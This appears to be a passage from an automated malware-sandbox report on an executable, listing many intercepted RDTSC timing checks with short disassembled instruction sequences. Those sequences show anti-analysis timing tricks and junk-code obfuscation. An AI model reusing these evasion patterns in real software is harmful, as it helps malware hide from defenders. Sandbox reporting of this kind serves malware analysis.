              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0793 second address: 11D0797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFF35 second address: 11CFF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFF3E second address: 11CFF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFF42 second address: 11CFF46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0371 second address: 11D0377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3B6B second address: 11D3B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3C70 second address: 11D3C95 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFACBF2F99h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D46C6 second address: 11D4715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007EFFAC79DCC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007EFFAC79DCC8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 jo 00007EFFAC79DCC6h 0x0000002f jmp 00007EFFAC79DCD5h 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push ecx 0x0000003a pop ecx 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4715 second address: 11D471F instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFFACBF2F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D49C9 second address: 11D49CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D49CE second address: 11D49D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007EFFACBF2F86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D66C5 second address: 11D6748 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFFAC79DCCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007EFFAC79DCD7h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007EFFAC79DCC8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d clc 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007EFFAC79DCC8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a sub dword ptr [ebp+122D33A2h], eax 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6748 second address: 11D6753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007EFFACBF2F86h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7A61 second address: 11D7A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7A65 second address: 11D7A7E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFACBF2F8Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7A7E second address: 11D7A92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8E5A second address: 11D8E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFACBF2F93h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7A92 second address: 11D7AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFAC79DCD1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D97F7 second address: 11D97FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D97FE second address: 11D982C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c mov si, C8CCh 0x00000010 call 00007EFFAC79DCD0h 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b je 00007EFFAC79DCCCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D982C second address: 11D9830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D9830 second address: 11D9851 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFFAC79DCC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007EFFAC79DCD0h 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D9851 second address: 11D9857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA328 second address: 11DA32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA32E second address: 11DA3B1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFFACBF2F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007EFFACBF2F88h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D1F50h] 0x0000002d push 00000000h 0x0000002f mov edi, 2294E5A2h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007EFFACBF2F88h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 mov esi, dword ptr [ebp+122D27FEh] 0x00000056 mov dword ptr [ebp+122D23A6h], eax 0x0000005c xchg eax, ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007EFFACBF2F90h 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DB881 second address: 11DB885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DB885 second address: 11DB8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007EFFACBF2F8Fh 0x0000000e push esi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 popad 0x00000013 nop 0x00000014 mov si, 624Eh 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007EFFACBF2F88h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jo 00007EFFACBF2F8Eh 0x0000003a push edx 0x0000003b mov esi, dword ptr [ebp+122D2CE7h] 0x00000041 pop esi 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 push eax 0x00000049 pop eax 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD85A second address: 11DD891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007EFFAC79DCCAh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 jmp 00007EFFAC79DCCAh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007EFFAC79DCD6h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD891 second address: 11DD897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD897 second address: 11DD8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007EFFAC79DCC6h 0x00000012 jne 00007EFFAC79DCC6h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD8B0 second address: 11DD8C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007EFFACBF2F8Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DB643 second address: 11DB647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFE5B second address: 11DFE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFE5F second address: 11DFE63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E0F09 second address: 11E0F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5022 second address: 11E5028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5028 second address: 11E5090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F95h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 jp 00007EFFACBF2FB5h 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007EFFACBF2F8Dh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5090 second address: 11E5094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3166 second address: 11E316C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E316C second address: 11E3172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3172 second address: 11E318E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007EFFACBF2F91h 0x00000011 jmp 00007EFFACBF2F8Bh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5835 second address: 11E583B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E77D6 second address: 11E783E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+12446C37h], eax 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+1245BEBFh], ecx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007EFFACBF2F88h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007EFFACBF2F97h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8A13 second address: 11E8A1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB93A second address: 11EB96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D1BE0h] 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D2BE7h] 0x00000017 push 00000000h 0x00000019 jns 00007EFFACBF2F95h 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB96F second address: 11EB989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECAA0 second address: 11ECAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFACBF2F8Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBC3F second address: 11EBC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBC4A second address: 11EBC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECBCC second address: 11ECBF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007EFFAC79DCD2h 0x00000010 je 00007EFFAC79DCCCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDB9B second address: 11EDB9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDC5F second address: 11EDC65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDC65 second address: 11EDC6F instructions: 0x00000000 rdtsc 0x00000002 je 00007EFFACBF2F8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4191 second address: 11F419A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2254 second address: 11F2258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F7C82 second address: 11F7C9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F7C9E second address: 11F7CAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F7CAC second address: 11F7CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9273 second address: 11F9277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD8C3 second address: 11FD8F5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFFAC79DCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push edx 0x0000000c jmp 00007EFFAC79DCCCh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFFAC79DCD6h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DDB3 second address: 118DDB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202929 second address: 120294F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007EFFAC79DCD9h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120294F second address: 120296E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFFACBF2F8Dh 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120296E second address: 1202972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202972 second address: 1202987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202987 second address: 12029AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007EFFAC79DCD8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12029AE second address: 12029B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202AC9 second address: 1202AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B44A second address: 119B454 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFFACBF2F8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B454 second address: 119B45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207DCB second address: 1207E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007EFFACBF2F86h 0x0000000a jg 00007EFFACBF2F86h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007EFFACBF2F8Ah 0x00000017 jmp 00007EFFACBF2F94h 0x0000001c je 00007EFFACBF2F86h 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208226 second address: 1208243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007EFFAC79DCCEh 0x0000000a pushad 0x0000000b je 00007EFFAC79DCC6h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208243 second address: 120824D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120824D second address: 1208256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208256 second address: 120825C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D243D second address: 11BAA14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007EFFAC79DCC6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 movzx edx, dx 0x0000001a lea eax, dword ptr [ebp+124771FDh] 0x00000020 mov dl, cl 0x00000022 push eax 0x00000023 pushad 0x00000024 jmp 00007EFFAC79DCD7h 0x00000029 push edx 0x0000002a push edx 0x0000002b pop edx 0x0000002c pop edx 0x0000002d popad 0x0000002e mov dword ptr [esp], eax 0x00000031 adc dx, 056Eh 0x00000036 call dword ptr [ebp+122D23F1h] 0x0000003c jmp 00007EFFAC79DCD3h 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 jo 00007EFFAC79DCC6h 0x0000004a pushad 0x0000004b popad 0x0000004c pop ebx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D254D second address: 11D2553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2553 second address: 11D2557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2557 second address: 11D255B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2A35 second address: 102ED9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f jno 00007EFFAC79DCCCh 0x00000015 push dword ptr [ebp+122D06C9h] 0x0000001b push ecx 0x0000001c add dword ptr [ebp+122D1BF2h], esi 0x00000022 pop ecx 0x00000023 call dword ptr [ebp+122D26F6h] 0x00000029 pushad 0x0000002a jmp 00007EFFAC79DCCCh 0x0000002f xor eax, eax 0x00000031 mov dword ptr [ebp+122D2558h], ebx 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b sub dword ptr [ebp+122D2558h], ecx 0x00000041 mov dword ptr [ebp+122D2D6Fh], eax 0x00000047 stc 0x00000048 mov esi, 0000003Ch 0x0000004d jmp 00007EFFAC79DCD9h 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 js 00007EFFAC79DCD8h 0x0000005c jmp 00007EFFAC79DCD2h 0x00000061 lodsw 0x00000063 mov dword ptr [ebp+122D2558h], eax 0x00000069 add eax, dword ptr [esp+24h] 